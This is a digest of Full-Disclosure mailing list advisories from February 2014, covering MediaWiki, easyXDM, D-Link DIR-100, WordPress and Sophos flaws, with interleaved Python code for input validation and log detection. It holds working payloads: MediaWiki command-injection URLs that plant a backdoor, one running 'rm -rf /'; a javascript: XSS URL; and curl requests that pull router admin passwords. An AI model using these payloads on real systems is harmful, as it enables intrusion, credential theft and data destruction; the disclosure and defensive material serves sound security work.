[Full-disclosure] Jetro Cockpit Secure Browsing vulnerability - remote code execution on all enterprise workstations simultaneously

2014-02-02 Thread Ronen Z
A critical vulnerability was discovered in Jetro Cockpit Secure Browsing, a
popular enterprise secure browsing solution.

The vulnerability allows simultaneous remote code execution into all the
enterprise workstations using the product. The vulnerability is unique in
that it breaks the basic value proposition of the security product in which
it is found.

Full disclosure and details here:
http://blog.quaji.com/2014/02/remote-code-execution-on-all-enterprise.html

Ronen Zilberman
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 2851-1] drupal6 security update

2014-02-02 Thread Salvatore Bonaccorso
------------------------------------------------------------------------
Debian Security Advisory DSA-2851-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
February 02, 2014  http://www.debian.org/security/faq
------------------------------------------------------------------------

Package: drupal6
Vulnerability  : impersonation
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2014-1475

Christian Mainka and Vladislav Mladenov reported a vulnerability in the
OpenID module of Drupal, a fully-featured content management framework.
A malicious user could exploit this flaw to log in as other users on the
site, including administrators, and hijack their accounts.

These fixes require extra updates to the database which can be done from
the administration pages.

For the oldstable distribution (squeeze), this problem has been fixed in
version 6.30-1.

We recommend that you upgrade your drupal6 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[Full-disclosure] Revision 1 (PoC added): MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)

2014-02-02 Thread Pichaya Morimoto

#
# MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit (CVE-2014-1610)
# Reported by Netanel Rubin - Check Point's Vulnerability Research Group (Jan 19, 2014)
# Fixed in 1.22.2, 1.21.5 and 1.19.11 (Jan 30, 2014)
# Affected website : Wikipedia.org and more !
#
# Exploit author : Xelenonz & @u0x (Pichaya Morimoto)
# Release dates : Feb 1, 2014
# Special Thanks to 2600 Thailand !
#


# Exploit:

1. upload Longcat.pdf to wikimedia cms site (with PDF Handler enabled)
http://vulnerable-site/index.php/Special:Upload
2. inject os cmd to upload a php-backdoor
http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|`echo%20"images/xnz.php`
3. access to php-backdoor!
http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root
4. happy pwning!!


# Related files:

thumb.php <-- extract all _GET array to params
/extensions/PdfHandler/PdfHandler_body.php <-- failed to escape w/width options
/includes/media/ImageHandler.php
/includes/GlobalFunctions.php
/includes/filerepo/file/File.php

# Vulnerability Analysis:

1. thumb.php
This script used to resize images if it is configured to be done
when the web browser requests the image
transform( $params, File::RENDER_NOW ); // << resize image by width/height
...
// Stream the file if there were no errors
$thumb->streamFile( $headers );
...
?>
2. /includes/filerepo/file/File.php
getHandler(); // << PDF Handler
...
$normalisedParams = $params;
$handler->normaliseParams( $this, $normalisedParams );
...
$thumb = $handler->doTransform( $this, $tmpThumbPath, $thumbUrl, $params );
...
?>
3. /extensions/PdfHandler/PdfHandler_body.php
&1";
...
$err = wfShellExec( $cmd, $retval );
...
?>
4. /includes/GlobalFunctions.php
Execute a shell command, with time and memory limits
Error generating thumbnail

เกิดปัญหาไม่สามารถทำรูปย่อได้: /bin/bash: -: command not found
convert: option requires an argument `-resize' @ error/convert.c/ConvertImageCommand/2380.
GPL Ghostscript 9.10: Unrecoverable error, exit code 1

GET /mediawiki1221/images/longcat.php?1=id HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: my_wikiLoggedOut=1391266363; my_wikiUserID=2; my_wikiUserName=Longcat; my_wiki_session=bvg0n4o0sn6ug04lg26luqfcg1

uid=33(www-data) gid=33(www-data) groups=33(www-data)

# Back-end $cmd

GlobalFunctions.php : wfShellExec()
cmd = ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150
-dBATCH -dNOPAUSE -q '/var/www/mediawiki1221/images/2/27/Longcat.pdf' |
'/usr/bin/convert' -depth 8 -resize 10|`echo "images/longcat.php` -
'/tmp/transform_0e377aad0e27-1.jpg') 2>&1

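The root cause above is a width parameter interpolated into a shell pipeline without escaping. The following is an added illustration in Python (not MediaWiki's or the exploit author's code) of the two defender-side pieces: a strict width check with the command built as argv lists instead of a shell string, and a detection pass over constructed access-log lines that flags thumb.php requests whose w= value is not a plain integer. MAX_WIDTH and the log lines are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Thumbnail widths can only ever be small positive integers, so the check
# is a strict whitelist.  MAX_WIDTH is a constructed bound for this example.
MAX_WIDTH = 4096

def validate_width(raw: str) -> int:
    """Return the width as an int; raise ValueError for anything else."""
    if not re.fullmatch(r"[1-9][0-9]{0,4}", raw):
        raise ValueError(f"width is not a plain positive integer: {raw!r}")
    width = int(raw)
    if width > MAX_WIDTH:
        raise ValueError(f"width {width} exceeds the maximum of {MAX_WIDTH}")
    return width

def width_is_valid(raw: str) -> bool:
    try:
        validate_width(raw)
        return True
    except ValueError:
        return False

def build_thumb_argv(src_path: str, dst_path: str, raw_width: str):
    """Argument vectors for the gs and convert stages of the pipeline.

    Handing argv lists to subprocess (no shell=True) means an unchecked
    value could only ever be a single argument, never shell syntax; the
    width check is still applied first as the primary control.
    """
    width = validate_width(raw_width)
    gs = ["gs", "-sDEVICE=jpeg", "-sOutputFile=-", "-dFirstPage=1",
          "-dLastPage=1", "-r150", "-dBATCH", "-dNOPAUSE", "-q", src_path]
    convert = ["convert", "-depth", "8", "-resize", str(width), "-", dst_path]
    return gs, convert

# Detection side: the quoted request line of a common-log-format entry.
REQUEST_LINE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/1\.[01]"')

def find_suspicious_thumb_requests(log_lines):
    """Return (line_number, raw_w) for each thumb.php hit whose w is not numeric."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if not parts.path.endswith("/thumb.php"):
            continue
        for raw_w in parse_qs(parts.query, keep_blank_values=True).get("w", []):
            if not re.fullmatch(r"[0-9]+", raw_w):
                hits.append((number, raw_w))
    return hits

# Constructed access-log lines for a self-check; line 2 carries a w= value
# with shell metacharacters of the kind described in the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Feb/2014:10:00:01 +0000] '
    '"GET /w/thumb.php?f=Report.pdf&w=120 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [02/Feb/2014:10:00:07 +0000] '
    '"GET /w/thumb.php?f=Longcat.pdf&w=10|%60echo%20x%60 HTTP/1.1" 500 312',
    '10.0.0.9 - - [02/Feb/2014:10:00:09 +0000] '
    '"GET /w/index.php?title=Main_Page HTTP/1.1" 200 8800',
]
```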


[Full-disclosure] [CVE-2014-1403] DOM XSS in EasyXDM 2.4.18

2014-02-02 Thread Krzysztof Kotowicz
Affected products
=================
easyXDM library < 2.4.19 - http://easyxdm.net/wp/

easyXDM is a JavaScript library that enables you as a developer to easily
work around the limitations set in place by the Same Origin Policy, in turn
making it easy to communicate and expose JavaScript APIs across domain
boundaries.

Vulnerabilities are fixed in version 2.4.19. All users are advised to
upgrade.

CVE
===
CVE-2014-1403

DOM XSS in name.html location.hash value


Description
-----------
EasyXDM uses the name.html file to bootstrap cross-origin communication
between documents. It accepts various parameters in the location.hash value,
one of which is the URL of the document to load. The value of this parameter
is not filtered, allowing a javascript: URL to be passed that may execute
arbitrary JavaScript code in the context of the domain hosting the EasyXDM
installation.

This vulnerability is described in greater detail in [1].

Analysis
--------

The root cause of the vulnerability is the following code in name.html
file:

if (location.hash) { // DOM XSS source
  if (location.hash.substring(1, 2) === "_") {
    var channel, url,
      hash = location.href.substring(location.href.indexOf("#") + 3),
      indexOf = hash.indexOf(",");
    if (indexOf == -1) {
      channel = hash;
    }
    else {
      channel = hash.substring(0, indexOf);
      url = decodeURIComponent(hash.substring(indexOf + 1));
    }
    switch (location.hash.substring(2, 3)) {
      // ...
      case "3":
        // NameTransport remote
        var guest = window.parent.frames[
          "easyXDM_" + channel + "_provider"
        ];
        if (!guest) {
          throw new Error("unable to reference window");
        }
        guest.easyXDM.Fn.get(channel)(window.name);
        location.href = url + "#_4" + channel + ","; // DOM XSS sink
        break;

Part of location hash, under certain conditions, ends up in location.href
assignment, triggering JS execution.

Proof of Concept
----------------

http://domain/example/bridge.html"; onload="document.getElementById('f').src='http://domain/name.html#_3constructor,javascript:alert(document.domain)//';">

Credits
===
Vulnerability found by Krzysztof Kotowicz 
http://blog.kotowicz.net

Timeline
========

  - 2013-01-xx - Discovery
  - 2013-01-10 - Notified project maintainer
  - 2013-01-19 - Fixed version release
  - 2013-01-31 - Public disclosure

Related links
=============
[1] http://blog.kotowicz.net/2014/01/xssing-with-shakespeare-name-calling.html
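The missing control in the name.html code quoted above is a check on the URL before it reaches location.href. The following is an added illustration in Python (not easyXDM's code; the fixed library's actual check may differ) that reproduces the fragment parsing from the advisory and then applies a scheme whitelist: only absolute http(s) URLs may be navigated to, and control characters are stripped before the scheme is examined so case and whitespace variants of a scheme do not slip through.

```python
import re
from urllib.parse import unquote, urlsplit

def parse_name_hash(href: str):
    """Return (type, channel, url_or_None) for an easyXDM-style fragment.

    Mirrors the parsing in name.html quoted above: the fragment must start
    with "_", the next character is the message type, and the remainder is
    "<channel>[,<url-encoded url>]".
    """
    frag = href.partition("#")[2]
    if len(frag) < 2 or frag[0] != "_":
        return None
    msg_type = frag[1]
    channel, sep, url = frag[2:].partition(",")
    return msg_type, channel, (unquote(url) if sep else None)

def safe_navigation_url(url: str) -> bool:
    """True only for absolute http(s) URLs; any other scheme is refused.

    Browsers drop tab/newline and leading control characters before parsing
    a URL, so the check strips every control character and space first
    (deliberately stricter than the browser) and compares the scheme
    case-insensitively.  This is the check the vulnerable branch lacked.
    """
    cleaned = re.sub(r"[\x00-\x20]", "", url)
    parts = urlsplit(cleaned)
    return parts.scheme.lower() in ("http", "https") and bool(parts.netloc)

def next_location(href: str):
    """Where the type-3 branch would navigate, or None when refused."""
    parsed = parse_name_hash(href)
    if parsed is None or parsed[0] != "3" or parsed[2] is None:
        return None
    _msg_type, channel, url = parsed
    if not safe_navigation_url(url):
        return None  # the assignment that was the DOM XSS sink never happens
    return url + "#_4" + channel + ","
```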

[Full-disclosure] Router D-Link DIR-100 Multiple Vulnerabilities

2014-02-02 Thread root
tl;dr: You could simply `ask` the D-Link DIR-100-D1 for the administrator 
password.
Report is also available at: 
http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt

Enjoy
* Title: Router D-Link DIR-100 Multiple Vulnerabilities
* Date: 2013-12-18
* Author: Felix Richter
* Contact: r...@euer.krebsco.de
* Vulnerable Software: 
ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b07_ALL_de_20120410.zip
* Patched Software:
ftp://ftp.dlink.de/dir/dir-100/driver_software/DIR-100_fw_revd_403b13_ALL_de_20131011.zip
* Report Version: 2.0
* Report URL: http://pigstarter.krebsco.de/report/2013-12-18_dir100.txt
* Vulnerable: D-Link DIR-100
* Hardware Revision: D1
* Software Version: 4.03B07 (from 2012-04-10)
* CVE Numbers:
  * CWE-287 Authentication Issues: CVE-2013-7051
  * CWE-255 Issues with Credential Management: CVE-2013-7052
  * CWE-352 Cross-Site Request Forgery: CVE-2013-7053
  * CWE-79  Cross-Site Scripting: CVE-2013-7054
  * CWE-200 Information Disclosure: CVE-2013-7055
* Google Dork: "D-Link Systems" inurl:bsc_internet.htm D1
* State: Patched by Vendor
* Link to Vendor Report: http://more.dlink.de/sicherheit/news.html#news8

# Table of Contents

1. Background
2. Vulnerability Description
3. Technical Description
4. Severity and Remediation
5. Timeline

# 1. Background

The DIR-100 is designed for easy and robust connectivity among heterogeneous
standards-based network devices. Computers can communicate directly with this
router for automatic opening and closing of UDP/TCP ports to take full
advantage of the security provided without sacrificing functionality of on-line
applications.

# 2 Vulnerability Description

Multiple vulnerabilities have been found in the D-Link DIR-100 Ethernet
Broadband Router Revision D (and potentially other devices sharing the
affected firmware) that could allow a remote attacker to:

 - Retrieve the administrator password without authentication, leading to
   authentication bypass [CWE-255]
 - Retrieve sensitive configuration parameters like the PPPoE username and
   password without authentication [CWE-200]
 - Execute privileged commands without authentication through a race
   condition, leading to weak authentication enforcement [CWE-287]
 - Send a formatted request to a victim which will then execute arbitrary
   commands on the device (CSRF) [CWE-352]
 - Store arbitrary JavaScript code which will be executed when a victim
   accesses the administrator interface [CWE-79]

CVE numbers for these vulnerabilities have not yet been assigned.

# 3 Technical Description of the Vulnerabilities

## 3.0 The DIR-100 Web Interface and CGI

The DIR-100 Web interface provides a cgi-script on `/cliget.cgi` for
unauthenticated users and `/cli.cgi` for authenticated requests.

The list of features provided by each cgi-script can be retrieved with:

curl 'http://192.168.1.104/cliget.cgi?cmd=help'
# and respectively when authenticated
curl 'http://192.168.1.104/cli.cgi?cmd=help'

## 3.1 Authentication Bypass

### Description

The administrator password is not protected in any way on the device: any
attacker with access to the administrator interface, which listens on port 80,
can retrieve it. The request that retrieves the administrator password does
not need to be authenticated.


### Proof of Concept

The web interface provides two distinct ways to retrieve the administrator
password:

curl 'http://192.168.0.1/cliget.cgi?cmd=$sys_user1'
curl 'http://192.168.0.1/cliget.cgi?cmd=easysetup%20summary'

## 3.2 Weak Authentication

### Description

As soon as a user is logged into the administration interface, the cli CGI
is `unlocked` and can be used without authenticating first, as the
cgi-script does not check any other authentication parameters such as
cookies or HTTP parameters. The only access check is whether the IP address
is the same.

### Proof of Concept

# open the router interface in a web browser and log in
firefox  'http://192.168.0.1/' 

# open a new terminal or another web-browser which is currently not logged
# in and try to access

curl 'http://192.168.0.1/cli.cgi?cmd=help'

# this request will be authenticated and it will not be redirected to the
# login page. If no user is logged in, the request will be redirected to
# the login 

## 3.3 Retrieve sensitive information

### Description

Besides retrieving the administrator password without authentication, it is
possible to retrieve other sensitive configuration from the device as well,
like the PPTP and PPPoE username and password, as well as the configured
DynDNS username and password and the configured mail log credentials, when
these parameters are configured.
No authentication is required.

### Proof of Concept

curl 'http://192.168.0.1/cliget.cgi?cmd=$ddns1'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_user'
curl 'http://192.168.0.1/cliget.cgi?cmd=$poe_pass'
curl 'http://192.168.0.1/cli

[Full-disclosure] Bypass the Stop User Enumeration WordPress Plugin

2014-02-02 Thread Andrew Horton
Stop User Enumeration is a WordPress plugin that provides protection
against an unauthenticated attacker gaining a list of all WordPress users.
This information can aid an attacker in further attacks against the website
including brute-force password guessing attacks. This can be performed
using wp-scan.
Homepage: http://wordpress.org/plugins/stop-user-enumeration/
Version: 1.2.4 (latest)

According to the full disclosure methodology I have publicly disclosed
this at the same time as notifying the vendor.

Advisory
-
An attacker can bypass the username enumeration protection by using POST
requests. The protection currently only stops GET requests to enumerate
users.

By sending POST requests with the body of "author=1" and incrementing the
number over successive requests, the entire set of WordPress users can be
enumerated.

The WordPress user information is disclosed in the HTML response body,
rather than in the redirect header, as with GET requests.

   POST / HTTP/1.1
   Host: www.wordpress.com
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 8

   author=1

Andrew Horton (urbanadventurer)
www.morningstarsecurity.com

Visit my meta-aggregator of security news at
http://www.morningstarsecurity.com/news/
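The bypass above works because the protection inspects the query string of GET requests only. The following is an added illustration in Python (not the plugin's code) that parses raw HTTP requests, models the GET-only check beside a corrected check that also reads url-encoded POST bodies, and shows the POST probe from the advisory passing the former and being caught by the latter. The request texts are constructed for the example.

```python
from urllib.parse import urlsplit, parse_qs

def parse_request(raw: str):
    """Minimal HTTP/1.1 request parser: (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    length = int(headers.get("content-length", "0"))
    return method, target, headers, body[:length]

def author_param_get_only(raw: str):
    """The bypassable behaviour: only GET query strings are consulted."""
    method, target, _headers, _body = parse_request(raw)
    if method != "GET":
        return None
    return parse_qs(urlsplit(target).query).get("author", [None])[0]

def author_param(raw: str):
    """Corrected: the query string for any method, plus url-encoded bodies."""
    method, target, headers, body = parse_request(raw)
    values = list(parse_qs(urlsplit(target).query).get("author", []))
    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    if method == "POST" and ctype == "application/x-www-form-urlencoded":
        values += parse_qs(body).get("author", [])
    return values[0] if values else None

def looks_like_enumeration(raw: str) -> bool:
    """True when any source supplies a purely numeric author id."""
    value = author_param(raw)
    return value is not None and value.isdigit()

# Constructed probes: the GET form the plugin blocks and the POST form
# described in the advisory.
GET_PROBE = "GET /?author=1 HTTP/1.1\r\nHost: www.example.com\r\n\r\n"
POST_PROBE = ("POST / HTTP/1.1\r\nHost: www.example.com\r\n"
              "Content-Type: application/x-www-form-urlencoded\r\n"
              "Content-Length: 8\r\n\r\nauthor=1")
```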

[Full-disclosure] CVE-2014-1610 description incorrect

2014-02-02 Thread Brandon Perry
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1610

It states that authentication is required to exploit this and this is not
true.

What does require authentication usually is uploading the file. If there is
already a djvu file that has been uploaded by another user, you do not need
authentication to exploit this.

https://gist.github.com/brandonprry/8746891

I believe this should be revised as the exploit itself does not require
authentication. I think that will also result in a score change as well.



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

[Full-disclosure] CVE-2014-1213 - Denial of Service in Sophos Anti Virus

2014-02-02 Thread advisories
Vulnerability title: Denial of Service in Sophos Anti Virus
CVE: CVE-2014-1213
Vendor: Sophos
Product: Anti Virus
Version: 10.0.11/Engine 3.48.x
Reported by: Graham Sutherland
Details:

The following system objects do not have access control lists (ACLs)
set, thus allowing any user to access and manipulate them:

Global objects (in namespace \Global, a.k.a. \BaseNamedObjects):

  $$!_EVENT_$!__
  $$!_EVENT_$!__DataUpdateRequest
  $$!_EVENT_$!__MmfMutexSAV-
  $$!_EVENT_$!__MmfMutexSAV-Info
  $$!_EVENT_$!__ReadyForUpdateSAV-
  $$!_EVENT_$!__ReadyForUpdateSAV-Info
  $$!_EVENT_$!__SAV-
  $$!_EVENT_$!__SAV-Info
  $$!_EVENT_$!__StateChange
  $$!_EVENT_$!__SuspendedSAV-
  $$!_EVENT_$!__SuspendedSAV-Info
  $$!_EVENT_$!__UpdateComplete
  $$!_EVENT_$!__UpdateMutex
  $$!_EVENT_$!__UpdateRequest
  $$!_MMMF_$!__
  SAV-
  SAV-Info

Session objects (in namespace \Sessions\n\BaseNamedObjects):

SophosALMonSessionInstance


Further details at:
http://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1213/


Copyright:
Copyright (c) Portcullis Computer Security Limited 2014, All rights
reserved worldwide. Permission is hereby granted for the electronic
redistribution of this information. It is not to be edited or altered in
any way without the express written consent of Portcullis Computer
Security Limited.

Disclaimer:
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO warranties, implied or otherwise, with regard to this information
or its use. Any use of this information is at the user's risk. In no
event shall the author/distributor (Portcullis Computer Security
Limited) be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.
